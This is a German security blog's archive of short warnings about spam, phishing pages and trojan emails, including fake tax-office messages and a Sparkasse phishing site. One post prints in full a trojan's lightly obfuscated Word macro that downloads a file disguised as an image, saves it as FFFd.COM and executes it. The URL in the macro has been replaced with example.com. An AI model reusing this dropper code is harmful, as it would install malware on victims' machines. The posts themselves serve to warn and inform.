Archiv der Kategorie: Viren, Würmer und anderes Getier

In dieser Kategorie erscheinen Artikel über Viren, Würmer und anderes Getier, dass sich nicht nur in freier Natur findet.

Jemand hat dir eine Videobotschaft hinterlassen

Angebliche Videobotschaft
Angebliche Videobotschaft

Wenn mir eine Fabienne Schulz eine Videobotschaft schreibt, dann doch bitte nur mir und nicht einem Thorsten W… Außerdem sollte sie wissen, dass Torsten nicht Fabienne Schulz heißt und sie selbst nicht „jemand“ ist, sondern Fabienne Schulz.

Wer in eine solch plumpe Falle tappt, der ist selber schuld.

Finger weg von solchen E-Mails. Insbesondere das der Flash-Player zur Zeit nicht koscher ist. Der Link führt allerdings über mehrere Umleitungen auf einen Fehler 403.

bit.ly/1vw1WmZ => dgnda.enmyas.su => b-unitd.com => tracker.brokeragecapital.com => bigprofitgenerator.com

Gute Nacht

(WordPress) Blogs gehackt – Fortsetzung 1

Paypal Betrugsversuch
Paypal Betrugsversuch – Betrug! stammt natürlich von mir
Vor einigen Tagen habe ich über die Einbrüche in WordPress Blogs und andere Systeme berichtet. Leider – oder glücklicherweise – waren die Einbrüche immer schon entdeckt und beseitigt, wenn ich versucht habe auf die Seiten zuzugreifen. Heute ist es mir (endlich) gelungen einen Screenshot zu einer der gehackten Seiten zu bekommen. Bisher waren die Seiten immer schon entfernt, wenn ich darauf zugreifen wollte. Heute hat mein Firefox zwar einen Betrugsversuch beim Abruf gemeldet, aber dadurch habe ich mich nicht irritieren lassen (nur wer genau weiß,was er tut, sollte diese Meldung ignorieren). Die gefälschte Paypal Seite war noch online, deshalb hier nun der Screenshot und ein Bericht, wie es nach der ersten Seite weiter geht. Sieht doch sehr echt aus – ist allerdings kein Kunststück.
(WordPress) Blogs gehackt – Fortsetzung 1 weiterlesen

SPAM: Ihr Finanzamt – ELSTER.DE

Gestern waren einige E-Mails im Postfach, die angeblich vom Finanzamt stammen. Ich habe zwei verschiedene Texte gefunden. Gemein ist allem Mails, dass sie einen Anhang mit Namen Erklarung09201429.zip enthalten, wobei die Zahl differieren kann. Das Zip-Archiv ist jedoch zerstört. Bei mir zeigt ark ein leeres Inhaltsverzeichnis an und unzip -l meldet:

End-of-central-directory signature not found. Either this file is not
a zipfile, or it constitutes one disk of a multi-part archive. In the
latter case the central directory and zipfile comment will be found on
the last disk(s) of this archive.

Damit ist der Trojaner soweit ich es beurteilen kann wirkungslos. Es sein denn, er nutzt eine Sicherheitslücke bei ZIP-Dateien unter Windows aus.

Ansonsten nichts neues. Hier noch der Text der E-Mails.

Sehr geehrte Damen und Herren,

USt.-IdentNr.: DE13592

Wir laden alle natürlichen und juristischen Personen für die Überprüfung durch und folgen Sie den Anweisungen des Inland Revenue (angebracht).

Ihre Datei finden Sie als D0C Datei im Anhang dieser E-Mail Folgen Sie einfach der Beschilderung zu vermeiden, sich als Person „in Gefahr“ nach dem ersten Test berichtet.

Material für die Konsultation (MR) ist vor allem für diejenigen, die Finanzdienstleistungen nutzen zu empfehlen (zB. Internet-Banking).

Sollten Sie die Daten nicht abholen, so werden diese nach 6 Monaten automatisch gelöscht.

Dies ist eine automatisch generierte E-Mail – bitte antworten Sie nicht an diese Mailadresse.

Mit freundlichen Grüßen

Ihr Finanzamt / Ihre Steuerverwaltung

HINWEIS:
Sie erhalten diese E-Mail, weil Sie bei der Datenübermittlung z.B. Ihrer Steuererklaerung die Mailbenachrichtigung auf diese E-Mailadresse gewünscht haben.
Bei Steuerbescheiden ist allein die Papierausfertigung rechtlich relevant.

Sehr geehrte Damen und Herren, irgendwas@example.com.

Wir laden alle natürlichen und juristischen Personen für die Überprüfung durch und folgen Sie den Anweisungen des Inland Revenue.

Folgen Sie einfach der Beschilderung zu vermeiden, sich als Person „in Gefahr“ nach dem ersten Test berichtet.

Material für die Konsultation (MR) ist vor allem für diejenigen, die Finanzdienstleistungen nutzen zu empfehlen (zB. Internet-Banking).

——– Ihre Datei finden Sie als D0C-Datei im Anhang dieser E-Mail ——–

Sollten Sie die Daten nicht abholen, so werden diese nach 6 Monaten automatisch gelöscht.
Dies ist eine automatisch generierte E-Mail – bitte antworten Sie nicht an diese Mailadresse.

IdentNr: 4008371707
Mit freundlichen Grüßen
Ihr Finanzamt / Ihre Steuerverwaltung
elster.de

Trojaner: Keine Minute vergeht in der ich nicht an dich denke

oder ähnlich lauten die Betreff Zeilen einer derzeit laufenden Welle zur Verbreitung von Trojanern. Der Text beschränkt sich auf ein oder zwei Sätze, wie:

Keine Minute vergeht in der ich nicht an dich denke, und darum schenke ich dir meine Liebe, denn ich spür, ich gehör einfach zu dir. Ich lieb dich!

D. Bischof

Angehängt ist ein ZIP-Archiv 4180.zip, in dem sich wiederum ein MS-Word Dokument abactinal642.doc mit einem Makro befindet. In diesem Fall ist nur leicht obfuskiertes Makro, das eine als Bild getarntes Programm als FFFd.COM im Profil des Nutzers abspeichert und aufruft. Den Link im Quelltext habe ich geändert, er funktioniert bereits nicht mehr.

Sub hui()
Dim DMtjPKZbDiINOsDjnWMDQUaGD As String
Dim vNFhXFNV_TueQRFNXVYWLqYTecVHXURZUNBDUyA As Integer
URL = "http://www.example.com/fotos/rollover5.jpg"
DMtjPKZbDiINOsDjnWMDQUaGD = Environ("USERPROFILE")
Dim lOMwCMuTOYqPBHJNCl: Set lOMwCMuTOYqPBHJNCl = CreateObject("Microsoft.XMLHTTP")
Dim CSGDWYMVOOBASEd: Set CSGDWYMVOOBASEd = CreateObject("Adodb.Stream")
lOMwCMuTOYqPBHJNCl.Open "GET", URL, False
lOMwCMuTOYqPBHJNCl.Send
With CSGDWYMVOOBASEd
.Type = 1
.Open
.write lOMwCMuTOYqPBHJNCl.responseBody
.SaveToFile DMtjPKZbDiINOsDjnWMDQUaGD & "\FFFd.COM", 2
End With
Shell DMtjPKZbDiINOsDjnWMDQUaGD & "\FFFd.COM"
End Sub

Pishing: Sparkasse Online-Banking – Kundendienstes-Sicherheits-update

Unter der Adresse spkass.worldnet.us/update/ (IP: 94.249.139.6) ist zur Zeit wieder eine Sparkassen Online Banking Pishing Seite aktiv. Leider erkennen dies zur Zeit nur 3 von 53 Virenscannern. Über diese Mails habe ich bereits vor gut einem Jahr berichtet, deshalb erspare ich mir weitere Ausführungen zur Mail. Es hat sich im Prinzip nichts geändert.

Glücklicherweise hat jemand diesen Versuch schon erkannt und die Seite entfernt / umgelenkt.

Update: 27. Juni 2014
Für die ausgefallene Seite gibt es nun einen Ersatz unter: skk-54278bf4a28221d672.yolasite.com, aber auch diese ist nicht mehr verfügbar.

skk-54278bf4a28221d672.yolasite.com is an alias for ddos-1476621086.us-east-1.elb.amazonaws.com.
ddos-1476621086.us-east-1.elb.amazonaws.com has address 54.243.34.189
ddos-1476621086.us-east-1.elb.amazonaws.com has address 54.235.94.176